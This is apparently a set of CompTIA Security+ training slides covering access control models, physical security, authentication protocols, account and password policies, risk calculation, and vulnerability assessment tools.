RBAC Example
Microsoft Active Directory
•Users and computers are put into groups based on their job role
•Permissions are set per group
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Rule-based Access Control (RBAC)
–Access is determined by a set of rules
–Access control lists (ACLs) list who can access what
• Implicit Deny rejects anything not explicitly allowed by the list
Types of Access Control
RBAC Example
Firewall Rules
•A list of rules that specify what is permitted through the firewall under what conditions
• IP addresses, ports, sources, destinations, and others
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Bell-LaPadula
– Focus on confidentiality
–No read-up (Simple Security Policy)
–No write-down (-property)
Information Models
Unclassified
Confidential
Secret
Top Secret
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Biba
– Focus on integrity
–No write-up (Simple Integrity Axiom)
–No read-down ( Integrity Axiom)
Information Models
Unverified
Trusted
Confirmed
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Clark-Wilson
–Constrained data items only accessed through transformative procedures
–Different applications for read and write
–Separation of duty
Information Models
Policies and Best Practices
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Helps prevent and uncover misuses or illegal activities by internal employees
• Lets others at the company see what that employee does
• An audit can be performed while the employee is away
• Acts as a deterrent if employees knows about the vacations and audits
• May only be mandated for higher ranking or those with financial responsibilities
Mandatory Vacations
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Employees are moved between two or more jobs in a scheduled system
• Helps prevent and uncover misuses or illegal actives by internal employees
• Also provides redundant skills and reduces boredom
• Does not work well in smaller companies
Job Rotation
Database Admin
Website Admin
Network Admin
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Limits misuse of systems and data
• Helps prevent fraud and error
• Split an important job into parts/steps and have them be performed by two or more people
• SoD in IT Security
–Restrict the amount of power held by any one individual
–A deferent person designs/implements as tests/audits security systems
–Any single system administrator account should be limited in its abilities
– Least Privilege – each IT person should only have permissions to what they need for their job
Separation of Duties
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• An operating system has been tested and is certified to be secure
• Common Criteria (CC)
• International standard ISO/IEC 15408
• A product receives a Evaluation Assurance Level (EAL) after testing
• Also applies to hardware, devices, and software
• For high security environments like government or military
Trusted OS
CompTIA Security+ Training
Authentication, Authorization, and Access Control
Key Terms You Should Know
Term Definition
Identification Verifying the true identity of a person
Single Factor Authentication
Using only one type of credentials for authentication
Multifactor Authentication
Using more than one type of credentials for authentication
Biometrics Using a biological trait such as fingerprint as an authentication credential
CompTIA Security+ Training
Authentication, Authorization, and Access Control
Key Terms You Should Know
Term Definition
Security Tokens A hardware device used for authentication most often in a challenge-response situation
Smart Cards Hardware cards that include electronics to be scanned or read for access to areas or resources
Common Access Cards US Department of Defense smart cards that are used to access computers and digital signatures
Personal Identification Verification Cards
US Government smart cards used to access buildings and computer systems
CompTIA Security+ Training
Authentication, Authorization, and Access Control
Key Terms You Should Know
Term Definition
Mandatory Access Control (MAC)
Inflexible access control that is controlled by administrators
Discretionary Access Control (DAC)
More flexible access control that allows object owners to share access
Role-based Access Control (RBAC)
Access control is based on the roles that a subject belongs to
Rule-based Access Control (RBAC)
Access is defined by a set of rules
Trusted OS
An operating system that meets the Common Criteria's requirements for security at a EAL of 4 or above
CompTIA Security+ Training
Authentication, Authorization, and Access Control
Key Terms You Should Know
Term Definition
Permissions, Privileges, or Rights
The level of access granted to users, groups, and roles
Objects
When referring to access control an object is what we are grating uses access to these can be riles, folders printers, or databases
Subjects
When referring to access control an subject is who we are granting object access to these can be people, computers, or processes
CompTIA Security+ Training
Authentication, Authorization, and Access Control
What We Covered
Authentication and Authorization
Identification vs. Authentication
Authentication and Authorization
Something You Know, Something You Have, and Something You Are
• Passwords
• Tokens
• Smart Cards
• Common Access Cards (CAC)
• Personal Identification Verification Cards (PIV)
• Biometrics
Single Factor vs. Multifactor Authentication
CompTIA Security+ Training
Authentication, Authorization, and Access Control
What We Covered
Policies and Best Practices
Mandatory Vacations
Job Rotation
Separation of Duties
Trusted OS
Access Control
Key Terms You Should Know
Types of Access Control
• Mandatory Access Control (MAC)
• Discretionary Access Control (DAC)
• Role-based Access Control (RBAC)
• Rule-based Access Control (RBAC)
Information Models
CompTIA Security+ Training Instructor: Lisa Szpunar
Physical and Environmental Security
CompTIA Security+ Training
Physical and Environmental Security
In This Lesson:
Exam Objectives:
2.6 Explain the impact and proper use of environmental controls
Partial Coverage of 3.6 and 4.2
Physical Security
Fencing
Mantraps
Access List
Proximity Readers
Video Surveillance and Monitoring
Hardware Locks • Cable Locks • Safe • Locking Cabinets
Environmental Security
HVAC
Hot and Cold Aisles
Environmental Monitoring and Controls
• Temperature and Humidity Controls
Fire Suppression
Power Systems
Electromagnetic Emissions
• Interference and Shielding
Physical Security
c
Fencing
c c
c
c
Server
Room
P
P
P
Security
Office
Fencing
• The outer layer of physical security
c
Mantrap
c c
c
Server
Room
P
P
P
Security
Office Access
List
Mantrap
• An small area that limits access to an area or individual
• A person must be allowed through the mantrap by someone with authority
• Access lists specify who is allowed into what areas
c c
c
c
Server
Room
Proximity Readers
P
P
P
Security
Office
#
Proximity Readers
• Reads the electronic signal from proximity devices
– Electronic ID cards or fobs
• Use Radio Frequency Identification RFID
• Can use one-time password authentication
c c
c
c
Video Surveillance
c c
c
Server
Room
P
P
P
c
Security
Office
#
Video Surveillance and Monitoring
• Closed Circuit television (CCTV)
• Recorded for later review
•May be monitored live
CompTIA Security+ Training
Physical and Environmental Security
• Cable Locks
– Laptops have a built-in slot meant for cable locks
–Secure a laptop or even a desktop and other devices to the desk
– Lock PC cases to keep people from removing or destroying hard drives and other components
• Safes and Locking Cabinets
–Store backups, documentation, and other important information in a locked cabinet or safe
• Rack mounted servers and appliances should be locked to the racks
• Don’t forget key management!
Hardware Locks
Environmental Security
CompTIA Security+ Training
Physical and Environmental Security
• Heating, ventilation, and air conditioning
• Server rooms, data centers, and computer labs need extra HVAC considerations
• Extra cooling and heat transfer
–Separate zone or separate system from the rest of the building
• HVAC on at all times – not turned down or off on weekends and holidays
• Contract experts that have experience with computer specific HVAC
HVAC Considerations
Raised Floor
Rack
Rack
Rack
Rack
HVAC
Hot Aisle
Hot Aisle
Hot Aisle
Hot and Cold Aisles
CompTIA Security+ Training
Physical and Environmental Security
• Systems for monitoring alerting on environmental variables
–Temperature
–Humidity
–Moisture
–Dust
–Smoke
–Chemical
• Temperature and humidity controls
–Needed for older systems and larger modern systems like communication equipment and datacenters
– Low humidity causes equipment damaging static shocks
–High humidity causes corrosion
Environmental Monitoring and Controls
CompTIA Security+ Training
Physical and Environmental Security
• Fire extinguisher
–Portable
–Unplug equipment if possible
Fire Suppression
http://www.usfa.fema.gov
CompTIA Security+ Training
Physical and Environmental Security
• Fire suppression system
–Built-in and integrated with fire/smoke detectors
–Water-based
• Not preferred for computers
• Should cut the power to computers first
Fire Suppression
Wet Pipe Dry Pipe Pre-action
Pipes could freeze, burst, or leak
Pipes remain undamaged
Pipes remain undamaged
Fast acting Slower acting Slow acting
No time to stop the system from starting
Allows time to shut off valve for false alarms
Gives you time to use extinguisher to put out a small fire before system goes off
CompTIA Security+ Training
Physical and Environmental Security
• Fire suppression system
–Built-in and integrated with fire/smoke detectors
–Gas-based
• Safer than water for electronics
• More expensive and more maintenance
• Could harm humans
Fire Suppression
CompTIA Security+ Training
Physical and Environmental Security
• Surge protector
–Protect electronics from a surge of electricity
–Range in size
• Small for a few devices
• Large for the entire building
–Can protect phone, coaxial, and Ethernet cables as well
–Passively wait for a spike in power
–Often one time use
Power Systems
CompTIA Security+ Training
Physical and Environmental Security
• Power conditioner
–Actively normalizes and improves the quality of electricity
–Different models do different things
• Regulate power voltage
• Filter noise
• Load balance
• Surge protection
• Battery backup
–Rack sized or building sized
Power Systems
CompTIA Security+ Training
Physical and Environmental Security
• Backup power
–Uninterruptable Power Supply (UPS)
• Instantaneous protection form power interruptions
• Short term solution
–Backup generators
• Not instantaneous
• Often used in conjunction with backup batteries
• Run on gas or diesel
• Require regular maintenance
Power Systems
CompTIA Security+ Training
Physical and Environmental Security
• Interference
–EMI: Electromagnetic Interference
• Electronic emissions that interrupt, obstruct, degrade, or desensitize the performance of electronics
–RFI: Radio Frequency Interference
• EMI that is projected across the radio spectrum
– From fluorescent lights, motors, and other outside equipment
–Also from the computer components themselves
Electromagnetic Emissions: Interference and Shielding
CompTIA Security+ Training
Physical and Environmental Security
• Shielding
–Prevents interference and protects your electronic emissions from being gathered by attackers
–Comes in many forms: spray, tape, filter, cage, and more
• Built into devices and computer components
–TEMPTEST certified systems
• Certified by the government to be electromagnetic emission free and safe to contain classified information
–Shielded Twisted Pair (STP) vs. Unshielded Twisted Pair (UTP)
Electromagnetic Emissions: Interference and Shielding
STP UTP
CompTIA Security+ Training
Physical and Environmental Security
Electromagnetic Emissions: Interference and Shielding
Best Practices
• Use shielded conduit when running cables
• Do not have communication cables in the same conduit as power cables
• Keep cables away from sources of EMI and RFI
• Use fiber optic cable if possible
CompTIA Security+ Training
Physical and Environmental Security
Key Terms You Should Know
Term Definition
Electromagnetic Interference (EMI)
Interference caused by the electronic emissions of other devices and cables
Radio Frequency Interference (RFI)
Electrical byproduct that is projected across the radio spectrum
Proximity Reader A device that reads proximity cards or fobs for authentication and entrance into a building or restricted area
Mantrap A small area between two doors where that a person can not get past without authorization
CompTIA Security+ Training
Physical and Environmental Security
What We Covered
Environmental Security
HVAC
Hot and Cold Aisles
Environmental Monitoring and Controls
• Temperature and Humidity Controls
Fire Suppression
Power Systems
Electromagnetic Emissions
• Interference and Shielding
Physical Security
Fencing
Mantraps
Access List
Proximity Readers
Video Surveillance and Monitoring
Hardware Locks • Cable Locks • Safe • Locking Cabinets
CompTIA Security+ Training Instructor: Lisa Szpunar
Authentication Services
CompTIA Security+ Training
Authentication Services
In This Lesson:
Introduction to Authentication Services
RADIUS
TACACS+
TACACS and XTACACS
Kerberos
LDAP
Exam Objective: 5.1 Explain the function and purpose of authentication services
Partial coverage of 5.2
CompTIA Security+ Training
Authentication Services
• Centralizes authentication
–Removes the need for multiple user databases
–Ease of maintenance
–Single Sign-on
• Allows users to log in from different places and through different means
– Internal clients
–Remote clients
–Mobile devices
Introduction to Authentication Services
CompTIA Security+ Training
Authentication Services
• Widely used
–Used by internet service providers (ISP)
• Every network access server relies on a central authentication server
–Used by corporate networks
• Every resource, storage, and application server uses a single authentication service
• Offers more than just authentication
–Who you are? (Authentication)
–What you are allowed to access? (Authorization)
–What you did? (Accounting)
Introduction to Authentication Services
CompTIA Security+ Training
Authentication Services
• Remote Authentication Dial-in User Service
• Does authentication, authorization, and accounting
–Authentication and authorization together
–Accounting separate
• Consolidates authentication of dispersed users onto a centralized server
• Flexible: works with varied systems and protocols
–Can use PPP, CHAP, PAP, EAP, and UNIX login
• UDP ports 1812 and 1813 (connectionless)
–1812 for authentication and authorization
–1813 for accounting
–Or the older standard of ports 1645 and 1646
RADIUS
RADIUS
User initiates connection to NAS
NAS asks user for credentials
User replies with credentials
Access-Request sent to RADIUS Server
RADIUS Server responds with Access-Accept or Access-Reject
Share a secret key
CompTIA Security+ Training
Authentication Services
• Remote Authentication Dial-in User Service
RADIUS
Security Concerns
•Sniffing – Entire payload of client/server
communication not encrypted
– Client/user communication vulnerable depending on implementation
•Spoofing
•Denial-of-Service
•Replay attacks
•MD5 associated vulnerabilities
Mitigations
•Harden the RADIUS server
•Use over other protocols like IPSec or SSL to layer on protection
•Choose unique shared secrets for each NAS
CompTIA Security+ Training
Authentication Services
• Terminal Access Controller Access Control System Plus
• Newest protocol based on TACACS
• Does authentication, authorization, and accounting separately
• Encrypts not just the users password but the entire payload
• TCP port 49 (connection-oriented)
• Proprietary to Cisco
• Works well with router management and terminal services
TACACS+
TACACS+ Weaknesses
• Accounting information is sent in clear text
• Limited integrity checking
CompTIA Security+ Training
Authentication Services
• Older version of TACACS
• Considered end-of-maintenance
• TACACS
–Had authentication and authorization in a combined process
–Used connectionless UDP
–Did not offer accounting
–Did not support multifactor authentication
• XTACACS (Extended TACACS)
–Separated authentication and authorization
–Had less granular accounting processes
–Used connectionless UDP
TACACS and XTACACS
CompTIA Security+ Training
Authentication Services
• Network authentication
–Works with multiple OS’s
• Single Sign-on (SSO)
–A user signs on once and all resource access is based on that logon
• Mutual authentication possible
• All authentication transactions are secure
• 3 heads of mythical Kerberos
–Key Distribution Center (KDC)
–Authentication Server (AS)
–Ticket Granting Server (TGS)
• Tickets and sessions are time-sensitive
Kerberos
TGS
AS
Kerberos
Principal presents credentials to AS and requests a Ticket Granting Ticket
AS responds with TGT and session key for TGS
Principal uses TGT to request a Service Ticket for the application server
TGS responds with Service Ticket
Principal presents Service Ticket to Application Server
Data transfer
CompTIA Security+ Training
Authentication Services
• Lightweight Directory Access Protocol
• Directory services queries (and modifications) made over an IP network
• X.500 directory
–A set of objects with attributes
–Organized in a hierarchical structure
–Examples:
• Microsoft Active Directory
• Novell eDirectory
• TCP/UDP port 389
–Other ports/services work with LDAP
LDAP
LDAP Distinguished Names
dc=globomantics, dc=local
ou=locations
ou=chicago ou=new york
ou=computers ou=computers ou=users ou=users
cn=eliberman
cn=hackmann
DN: cn=hackmann, ou=users, ou=chicago, ou=locations, dc=globomantics, dc=local
CompTIA Security+ Training
Authentication Services
• Lightweight Directory Access Protocol
LDAP
Security Concerns
•No security by itself – Simple authentication only adds
clear text authentication
– The Simple Authentication and Security Layer protocol (SASL) adds encrypted authentication
Mitigations
•Harden LDAP servers
•Use SASL
•Use LDAP over SSL/TLS (LDAPS)
•Block port 389 at the border firewall (or 636 for LDAPS)
CompTIA Security+ Training
Authentication Services
Key Terms You Should Know
Term Definition
Remote Authentication Dial-in User Service
(RADIUS)
A standard protocol for providing AAA services that uses UDP and combines authentication and authorization
Network Access Server/Remote Access Server
(NAS/RAS)
The client to the RADIUS or TACACS+. A user communicates with this server instead of direction with the authentication server
Terminal Access Controller Access Control System Plus
(TACACS+)
A standard protocol for providing AAA services that uses TCP and separates authentication and authorization
Extended Terminal Access Controller Access Control
System (XTACACS)
An older version of TACACS that had limited accounting functionality
CompTIA Security+ Training
Authentication Services
Key Terms You Should Know
Term Definition
Terminal Access Controller Access Control System
(TACACS)
The original TACACS that used UDP and had no accounting
Kerberos A strongly encrypted network authentication protocol that offers a single sign-on for all network resources
Key Distribution Center (KDC)
A component of the Kerberos system that includes the AS for authentication and TGS for secure distribution of keys
Authentication Server/Service (AS)
A component of the Kerberos system that handles authentication
CompTIA Security+ Training
Authentication Services
Key Terms You Should Know
Term Definition
Ticket Granting Server/Service (TGS)
A component of the Kerberos system that handles the secure distribution of keys
Single Sign-on (SSO) A user only needs to enter one set of credentials one time and can access all authorized resources and applications
Lightweight Directory Access Protocol (LDAP)
A directory services protocol used to access and modify x.500 hierarchical directories across a TCP/IP network
Distinguished Name (DN) The unique name given to a directory object based on its location in the hierarchy
CompTIA Security+ Training
Authentication Services
What We Covered
Introduction to Authentication Services
RADIUS
TACACS+
TACACS and XTACACS
Kerberos
LDAP
CompTIA Security+ Training Instructor: Lisa Szpunar
User Account Management
CompTIA Security+ Training
User Account Management
In This Lesson:
Exam Objective: 5.3 Implement appropriate security controls
when performing account management
Privilege Management
• User Assigned Privileges
• Group Based Privileges
User Account Policy
• Users with Multiple Accounts/Roles
• System/Administrator Accounts
• Logon Time Restrictions
• Temporary Access
• Account Disablement
Password Policies
• Complexity and Length
• Expiration
• Recovery
• Lockout
CompTIA Security+ Training
User Account Management
• The administrating what resources and data that is available to users and groups within an organization
• User assigned privileges
–Privileges are granted specifically and individually for each user
–Not scalable
–Difficult to make global changes
• Group based privileges
–User privileges are inherited from the group
–Can be as simple as locations or departments
–Can be very granular and have a group for each job role (Role-based management)
• Users can be members of multiple groups
Privilege Management
Accounting Department
Full Access
Read Only
Accounting Department Group
Group Based Privileges
AR Resource
AP Resource Accounts Payable
Accounts Receivable
Accounting Managers
Accounting Department Group
Group Based Privileges
Read Only
Full Access
Accounts Payable
Accounts Receivable
Accounting Managers
AR Resource
Accounts Payable Group
Accounts Receivable Group
Accounting Managers Group
AP Resource
CompTIA Security+ Training
User Account Management
• Users with multiple accounts/roles
–Create separate accounts for administration and regular use
• Only use an admin account for doing admin tasks
• The user must have different passwords for each account
– Even for accounts outside the company
• Multifactor authentication forces this
–When separation of duties is not needed
• Add users to multiple groups depending on their roles
• Understand how conflicting permissions are handled
User Account Policy
CompTIA Security+ Training
User Account Management
• System/administrator accounts
–Do not have accounts that have company wide administrative privileges
–Give admin accounts only the privileges they need
• Logon time restrictions
– Limits the amount of time that attackers can use accounts
• Temporary Access
–Grant least privileges
–Set the expiration date
User Account Policy
CompTIA Security+ Training
User Account Management
• Add users to groups
• Assign permissions to groups
• Configure time of day restrictions
• Create a temporary account and set it to expire
Microsoft Active Directory Users and Groups Demonstration
CompTIA Security+ Training
User Account Management
• Account disablement
–Account expiration
• Temporary or guest accounts can be set to automatically expire
– Inactive accounts
• Accounts are configured to automatically enter a lock-out state if they are inactive for a period of time
– Even accounts that are not set to expire
–User account and data deletion policy
• Breaks the audit trail
• Transfer data first including encryption keys
User Account Policy
CompTIA Security+ Training
User Account Management
• Complexity and Length
–At least 8 characters (longer is better)
–Must include uppercase and lowercase letters
–Must include at least one number or special character
• Expiration
–Passwords expire at a regular interval
–Require passwords to be different from the password history
Password Policies
CompTIA Security+ Training
User Account Management
• Recovery/Reset
– Identification and/or authentication should happen as part of the reset process
• Lockout
–Account lockout threshold for failed logon attempts
–Thoroughly plan your lockout policy
• Cached credentials
• Service accounts
• Educate users on protecting their password and choosing strong passwords
Password Policies
User Best Practices for Passwords
Protecting Your Passwords
• Never tell your password to anyone
– Emails asking for your password are fraudulent
• Do not write passwords down
– If you must write them down, store the paper in a secure place (not tacked
to your bulletin board) and destroy (not just throw away) it once you have
memorized it
• Change your password immediately if you suspect it has been compromised
• Use a different password for every account
– Using the same password means that if someone gets the password for
one of your accounts, it can be used on your other accounts too
• Do not let applications like web browsers store important passwords. If your
computer is compromised then those passwords are available to the attacker
• Be sure you are entering your password into the real website (not a faked
version) every time
• Create strong passwords
User Best Practices for Passwords
Creating Strong Passwords
• Should be at least 8 characters in length – longer for more important
accounts
• Should include numbers and special characters
– Should not be numbers associated with you like your address
– Special characters are not numbers or letters. Examples are *, &, $, _
– Consider placing your special characters in the middle of the password
instead of the last character
– Don’t just replace a letter with a common special character replacement
like replacing S with $ or O with 0
• If passwords are case sensitive, use a combination of upper and lowercase
letters
– Put uppercase letters in the middle of the password, not just
as the first or last character
User Best Practices for Passwords
Creating Strong Passwords
• Should not be a single real (dictionary) word
– It should not include names of your pets or family members
• The best method to creating a seemingly random, strong password is to use
a string of characters that corresponds with a phrase that helps you
remember
– Password: i8ccc&T4b
– Reminder Phrase: I ate chocolate chip cookies and tea for breakfast
CompTIA Security+ Training
User Account Management
Key Terms You Should Know
Term Definition
User Assigned Privileges The data and resources that users are allowed to access and change are set on a user-by-user basis
Group Based Privileges
Users are grouped together by a common criteria. Privileges are set for the group and the users inherit the group privileges
CompTIA Security+ Training
User Account Management
What We Covered
Privilege Management
• User Assigned Privileges
• Group Based Privileges
User Account Policy
• Users with Multiple Accounts/Roles
• System/Administrator Accounts
• Logon Time Restrictions
• Temporary Access
• Account Disablement
Password Policies
• Complexity and Length
• Expiration
• Recovery
• Lockout
CompTIA Security+ Training Instructor: Lisa Szpunar
Risk Management
CompTIA Security+ Training
Risk Management
In This Lesson:
Exam Objective: 2.1 (Partial) Explain risk related concepts
3.7 (Partial) Implement assessment tools and techniques to discover security threats and vulnerabilities
Risk Management Vocabulary
• Asset
• Vulnerability
• Threat
• Risk
• Impact
• Qualitative Assessment
• Quantitative Assessment
Risk Calculation
• Impact Analysis
• Threat vs. Likelihood
• Annualized Loss Expectancy (ALE)
Options for Handling Risk
• Risk-avoidance
• Transference
• Acceptance
• Mitigation
• Deterrence
Control Types
• Technical
• Management
• Operational
CompTIA Security+ Training
Risk Management
Risk Management Vocabulary
• Asset
–What we are tying to protect: people, property, information, and reputation
• Vulnerability
–A flaw, weakness, or gap that can be exploited by threats to gain unauthorized access to an asset
• Threat
–Something that can exploit a vulnerability and can potentially cause loss/harm to assets
• Risk
–The possibility of damage, destruction, or theft of an asset
CompTIA Security+ Training
Risk Management
Risk Management Vocabulary
• Impact
– The result of a risk
• Qualitative Assessment
– An assessment based on the sensitivity of an asset
– Assigns a weight, grade, or class to an asset instead of a dollar amount
• Quantitative Assessment
– An assessment based on the monetary worth of an asset
– Calculates the cost impact of an incident
CompTIA Security+ Training
Risk Management
Evaluation Mitigation and Deterrence
Risk Calculation
Threat and Vulnerability Assessment
Asset Identification
Risk Management Steps
CompTIA Security+ Training
Risk Management
• What properties, belongings, resources, data, systems, and people does a company possess?
• Inventory and prioritize
• Which assets have the most value? (Quantitative)
• Which assets are most important? (Qualitative)
–Mission critical
– Irreplaceable
• Once assets are identified and it can be determined what risks could affect them and what the impact would be
Asset Identification
CompTIA Security+ Training
Risk Management
Threat and Vulnerability Assessment
• Methods
– Interviews
–Evaluations
–Penetration testing
–Vulnerability scanning
• Prioritize
• Coordinate with business impact analysis
CompTIA Security+ Training
Risk Management
• Determine the impact of a successful exploitation of a vulnerability
• For all assets
–Theft, loss, damage of asset
• For IT systems
– Loss of confidentiality, integrity, and/or availability
Impact Analysis
Impact Level
Tangible Assets and Resources
Intangible: Mission, Reputation, Interest
Human Assets
Low Some Notable --
Moderate Costly Violate, harm, or impede Injury
High Very costly Significantly violate, harm, or impede
Serious injury or death
Risk Calculation
CompTIA Security+ Training
Risk Management
Risk Calculation
vs.
Risk Calculation
Threat
•An event that intentionally or accidentally exploits a vulnerability • Steals, damages, or destroys an asset
Likelihood
•What are the chances that a threat will take place? •High, moderate, or low •Annualized rate of occurrence
CompTIA Security+ Training
Risk Management
Asset Value AV How much money something is worth
Exposure Factor EF A frequency rate, measure of magnitude, or other multiplier specific to each asset
Single Loss Expectancy AV x EF = SLE
SLE How much is estimated to be lost on a signal occurrence of a given risk
Annualized Rate of Occurrence ARO Probability of a SLE happening or how many times a SLE is expected to happen in a given year
Annualized Loss Expectancy ALE How much is estimated to be lost each year to a given risk
Risk Calculation
Risk Calculation
CompTIA Security+ Training
Risk Management
Annualized Loss Expectancy Example
A web server for an e-commerce business generates $5,000 per hour. This web server’s probability of failing within one year is 10%. If the web server goes down, it takes 2 hours to get back up and running again.
Risk Calculation
AV
EF ARO
AV x EF = SLE SLE x ARO = ALE
5,000 x 2 = $10,000 10,000 x .1 = $1000
Risk Calculation
CompTIA Security+ Training
Risk Management
Annualized Loss Expectancy Example
A web server for an e-commerce business generates $5,000 per hour. This web server’s probability of failing within one year is 10%. If the webs server goes down, it takes 2 hours to get back up and running again. The estimated cost to replace failed components in the server is $200.
Risk Calculation
AV x EF = SLE SLE x ARO = ALE
5,000 x 2 = $10,200 10,200 x .1 = $1020 + 200
Risk Calculation
Options for Handling Risk
Mitigation and Deterrence
Risk-avoidance
Transference
Mitigation
Deterrence
Acceptance
Avoid the risk by no longer having or doing what is associated with the risk
Share some of the burden of the risk with another entity like an insurance company
Take action to try to reduce the likelihood or impact of the risk
Make the risk less enticing to attackers with threat of prosecution or other public safeguards
Retain a risk if the cost to mitigate is more costly than the impact of an attack
CompTIA Security+ Training
Risk Management
Control Types
Recommended Security Controls for Federal Information Systems and Organizations NIST Special Publication 800-53 available at http://csrc.nist.gov/
Management Assessment and
Planning
Technical Systems
Operational Actions
Mitigation and Deterrence
CompTIA Security+ Training
Risk Management
Control Types
Recommended Security Controls for Federal Information Systems and Organizations NIST Special Publication 800-53 available at http://csrc.nist.gov/
Management Assessment and
Planning
Technical Systems
Operational Actions
Mitigation and Deterrence
Control Type Families
Control Type/Class Family
Management Security Assessment and Authorization
Planning
Risk Assessment
System and Services Acquisition
Program Management
Technical Access Control
Audit and Accountability
Identification and Authentication
System and Communications Protection
Mitigation and Deterrence
Control Type Families
Control Type/Class Family
Operational Awareness and Training
Configuration Management
Contingency Planning
Incident Response
Maintenance
Media Protection
Physical and Environment Protection
Personnel Security
System and Information Integrity
Mitigation and Deterrence
CompTIA Security+ Training
Risk Management
Evaluation
• Review the adequacy of security controls – Did they eliminate the risk? – Did they reduce risk?
• Is there any residual risk?
• Continue to look for new threats and vulnerabilities
CompTIA Security+ Training
Risk Management
Key Terms You Should Know
Term Definition
Asset What we are tying to protect: people, property, information, and reputation
Vulnerability
A flaw, weakness, or gaps that can be exploited by threats to gain unauthorized access to an asset
Threat Something that exploits a vulnerability and can potentially cause loss/harm to assets
Risk The possibility of damage, destruction, or theft of an asset
CompTIA Security+ Training
Risk Management
Key Terms You Should Know
Term Definition
Quantitative
In terms of risk assessment, a quantitative assessment is one based on the monetary value of an asset or the cost of a risk’s impact
Qualitative
In terms of risk assessment, a qualitative assessment is one based on the importance or sensitivity of an asset
Impact
The outcome of a risk happening. The cost of a risk or the damage or loss of assets cased by a risk
Likelihood The probability that a risk with happen
CompTIA Security+ Training
Risk Management
Key Terms You Should Know
Term Definition
Annualized Loss Expectancy (ALE)
How much money is expected to be lost from a particular risk in one year
Annualized Rate of Occurrence (ARO)
The probability of a SLE happening or how many times a SLE is expected to happen in a year
Single Loss Expectancy (SLE)
How much money is expected to be lost from a single incident of a risk
Asset Value (AV) How much an asset is worth. Based on how much money it is making for the company as well as the cost to replace
Exposure Factor (EF)
A frequency rate, measure of magnitude, or other multiplier specific to each asset
CompTIA Security+ Training
Risk Management
Key Terms You Should Know
Term Definition
Risk-avoidance No longer using or doing something that is vulnerable
Transference Sharing a risk with a third party
Acceptance
Deciding to tolerate the impact of a risk. Often used with low level risks or residual risk after mitigation
Mitigation Actively employing controls to lower the likelihood or impact of a risk
Deterrence Making a threat less attractive to attackers
CompTIA Security+ Training
Risk Management
What We Covered
Risk Management Vocabulary
• Asset
• Vulnerability
• Threat
• Risk
• Impact
• Qualitative Assessment
• Quantitative Assessment
Risk Calculation
• Impact Analysis
• Threat vs. Likelihood
• Annualized Loss Expectancy (ALE)
Options for Handling Risk
• Risk-avoidance
• Transference
• Acceptance
• Mitigation
• Deterrence
Control Types
• Technical
• Management
• Operational
CompTIA Security+ Training Instructor: Lisa Szpunar
Threat and Vulnerability Assessment and Detection
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
In This Lesson:
Assessment Types
• Vulnerability
• Threat
• Risk
Assessment Techniques
• Baseline Reporting
• Code Review
• Determine Attack Surface
• Architecture
• Design Review
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
In This Lesson:
Exam Objective: 3.7 (Partial) Implement assessment tools
and techniques to discover security threats and vulnerabilities
3.8 Within the realm of vulnerability assessments, explain the proper use of penetration testing versus vulnerability scanning
Testing and Scanning
Tools
• Protocol Analyzer / Sniffer
• Port Scanner
• Honeypot and Honeynet
Vulnerability Scanning
Penetration Testing
• Black, White, and Gray Box Testing
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
Assessment Types
Assessment Type
Definition Benefits
Vulnerability Finding security flaws Baselines and ongoing security
Threat
Determining what threats line up with the vulnerabilities for your particular systems Analyzing the tools and resources that attackers have
Zero in on specific security implementations
Risk Determining what the risks are and the likelihood and impact of those risks
Prioritize security Help determine security budgeting
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Baseline Reporting
– First you need a baseline
–Compare the current to the baseline after changes or events
–Software can automatically generate reports about differences that don’t match the baseline (change detection)
–Good for regulatory compliance
Assessment Techniques
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Code Review
– Looking at custom made code to find holes
• Injection or cross-site vulnerabilities
–Manual assessment
• A detailed reading through the source code (should be done by skilled developers)
–Automated assessment
• Using tools to scan the code
Assessment Techniques
Black Box
White Box
Gray Box
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Determine Attack Surface
–The part of an application or system that is accessible or visible
–Can include interfaces, protocols, code, data, and more
–Practice attack surface reduction (ASR) to limit potential damage
• Turn off unnecessary services and functions
• Allow only least privileges
• Strengthen authentication services
Assessment Techniques
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Architecture
–Reviews how a system or application is interconnected with the network architecture
• How it interacts with the users, databases, devices, browsers, and services
• How do those interconnections effect security
Assessment Techniques
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Design Reviews
–Application design review
• Done during the development process
• Looks at the attack surface of an application
– User inputs and interactions
–Network design review
• Reviews the network and system design
– What ports and protocols are open?
– What rules and access controls are in place?
– What information models are used?
Assessment Techniques
Testing and Scanning
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Protocol Analyzer / Sniffer
–Captures packets in route and then analyzes them
• Resources, ports, and source/destination addresses
–Used for troubleshooting as well as security
• Malicious traffic
• Misconfigurations
• Network baselines
–Wired and wireless options
–Applications/appliances have GUIs and reports
• Wireshark
• Tcpdump (Linux command line)
• NAI Sniffer
Tools
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Port Scanner
– Find out what ports are open, closed, or filtered
– Find ports you didn’t know were open
–SYN packets are one way to test how ports respond
–Attackers use port scanning to find ports that provide services that can be exploited
–Applications
• Nmap
• Included with vulnerability scanners
Tools
SYN Packet Response
SYN/ACK RST No response
Open Closed Filtered
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Honeypot
–A system created for the purpose of letting attackers attack it and studying the results
–Honeynet
• More than one honeypot working together
• An entire network set up to invite attack
– Applications, services, and user accounts
• Uses virtualization
• Sometimes integrated with a larger IDS/IPS
–Uses
• Development and research
• Information gathering and decoy
Tools
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Tests for known vulnerabilities
• Passively tests security controls
• Performs scans that look for the latest vulnerabilities
• Many types of vulnerability scanners available
• Plan vulnerability scanning
–Backup first –Do during off hours
–Once a month or once a quarter
